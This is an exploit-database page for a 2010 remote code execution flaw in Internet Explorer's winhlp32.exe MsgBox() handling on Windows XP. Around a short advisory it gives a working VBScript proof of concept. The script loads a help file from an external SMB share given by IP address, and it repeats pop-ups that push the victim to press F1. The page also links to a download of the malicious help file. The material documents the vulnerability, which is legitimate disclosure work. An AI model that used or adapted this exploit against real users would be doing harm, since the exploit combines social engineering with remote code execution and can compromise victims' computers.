Lucene search
K

Internet Explorer winhlp32.exe 'MsgBox()'远程代码执行漏洞

🗓️ 04 Mar 2010 00:00:00Reported by RootType 
seebug
 seebug
🔗 www.seebug.org👁 33 Views

Internet Explorer winhlp32.exe 'MsgBox()' remote code execution vulnerabilit

Related
Code

                                                Microsoft Internet Explorer is prone to a remote code execution vulnerability.
 
Source (iSEC Security Research):
http://isec.pl/vulnerabilities10.html
 
Attackers can exploit this issue to execute arbitrary code in the context of the user running the application. Successful exploits will compromise the application and possibly the underlying computer.
 
Note attackers must use social-engineering techniques to convince an unsuspecting user to press the 'F1' key when the attacker's message box prompts them to do so.
 
Internet Explorer 6, 7, and 8 are vulnerable when running on the Windows XP platform.
 
===============================================================
A copy of test.hlp can be downloaded from here:
http://www.exploit-db.com/sploits/msgbox_test_help.zip
===============================================================
 
<html>
<script type="text/vbscript">
big = "\\184.73.14.110\PUBLIC\test.hlp"
  
//For i=1 to 2500
//  big = big & "\..\"
//Next
  
  
MsgBox "please press F1 to save the world", ,"please save the world",
big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
MsgBox "press F1 to close this annoying popup", ,"", big, 1
</script>
</html>
                              

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation